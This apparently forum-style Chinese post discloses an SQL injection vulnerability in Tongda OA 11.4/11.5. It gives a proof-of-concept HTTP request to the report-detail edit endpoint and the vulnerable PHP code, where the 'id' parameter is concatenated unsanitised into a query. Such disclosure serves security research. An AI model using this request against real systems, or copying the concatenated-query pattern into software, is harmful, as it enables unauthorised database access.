跳转至

通达OA11.5SQL注入漏洞

当时测试的版本是11.4。后来发现11.5也没有修复。其他版本未测试。

通达OA低版本存在多处SQL注入漏洞。很多地方都存在问题。我只发一个,剩下的坛友自己挖掘吧,也许有意想不到的结果。~

POC

GET /general/appbuilder/web/report/repdetail/edit?id=11&link_type=false&slot={} HTTP/1.1
Host: 192.168.1.11
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=42mi9cekm88g7ftbgllua7pl01; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=ef5494c8
Upgrade-Insecure-Requests: 1

需要一个可以登录系统的账号,普通权限即可。

general\appbuilder\modules\report\controllers\RepdetailController.php 函数 actionEdit()

public function actionEdit()
{
        Yii::$app->response->format = yii\web\Response::FORMAT_JSON;
        $_GET = modules\appdesign\models\AppUtils::toGBK($_GET);
        $id = $_GET["id"];
        $slot = $_GET["slot"];
        $link_type = $_GET["link_type"];
        $RepDetail = modules\report\models\RepDetail::find()->where("id=" . $id)->Asarray()->One();

注入参数:id

测试可以:

企业微信截图_232987fb-7df5-459a-afc5-7274c50af0ca